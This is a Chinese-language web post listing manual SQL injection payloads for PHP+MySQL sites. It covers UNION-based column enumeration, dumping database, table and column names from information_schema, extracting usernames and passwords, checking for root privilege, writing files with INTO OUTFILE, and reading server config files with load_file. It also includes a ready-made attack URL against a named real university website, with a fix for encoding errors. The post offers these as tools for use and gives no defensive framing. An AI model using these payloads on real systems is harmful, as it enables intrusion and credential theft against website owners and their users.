PHP+MySQL 手工注入语句大全 推荐
Order by num/*
and 1=1 union select 1,2,3,4,5…….n/*
and 1=2 union select 1,5…..n/* 利用内置函数暴数据库信息version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all select version() /* and 1=2 union all select database() /* and 1=2 union all select user() /*
数据库权限:and ord(mid(user(),1,1))=114 /* 返回正常说明为root
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息 and 1=2 union select 1,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1
and 1=2 union select 1,TABLE_NAME,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
and 1=2 Union select 1,COLUMN_NAME,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1
and 1=2 Union select 1,用户名段,密码段,9 from 表名 limit 0,1 高级用法(一个可用字段显示两个数据内容): Union select 1,3concat(用户名段,0x3c,密码段),1
条件:1、知道站点物理路径 2、有足够大的权限(可以用select …. from mysql.user测试) 3、magic_quotes_gpc()=OFF select ‘' into outfile ‘物理路径'
网站常用配置文件 config.inc.php、config.php。load_file()时要用replace(load_file(HEX),char(60),char(32)) 注: Char(60)表示 < Char(32)表示 空格
当注射后页面显示: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION' 如:http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),user()%20 这是由于前后编码不一致造成的, 解决方法:在参数前加上 unhex(hex(参数))就可以了。上面的URL就可以改为: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433A5C626F6F742E696E69))),unhex(hex(user()))%20 既可以继续注射了。。。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |